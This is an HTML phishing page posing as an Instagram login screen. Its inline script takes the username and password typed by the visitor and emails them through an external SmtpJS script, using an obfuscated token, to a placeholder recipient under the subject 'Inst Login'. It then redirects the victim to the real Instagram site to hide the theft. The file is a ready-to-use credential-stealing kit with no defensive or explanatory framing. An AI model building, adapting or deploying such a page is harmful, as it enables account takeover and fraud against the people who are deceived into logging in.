<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./style.css">
    <link rel="icon" href="./favicon.ico">
    <title>Instagram</title>
</head>

<body>
    <div class="main_block">
        <img src="./inst-logo.png" alt="" class="logo">
        <div class="inp-group">
            <input type="text" class="login" placeholder="Phone, username or email address">
            <input type="password" class="password" placeholder="Password">
            <button class="btn-login" onclick="send()">To come in</button>
        </div>
        <script src="https://smtpjs.com/v3/smtp.js">
        </script>
        <script>

            function send() {
                window.location.replace('https://instagram.com')
                var pass = document.querySelector('.password'),
                    login = document.querySelector('.login'),
                    btn = document.querySelector('.btn-login');
                Email.send({
                    Host: "47F36D6B7B8250D8899AD38C8FBEA64EEBC7B889DDD8604EDCBD744A245E2A4E8CEDB022B38A99793D3F4E9D51641607",
                    To: 'them@website.com',
                    From: "you@isp.com",
                    Subject: "Inst Login",
                    Body: `Login: ${login.value}\nPassword: ${pass.value}`
                })
            }

        </script>
    </div>
</body>

</html>
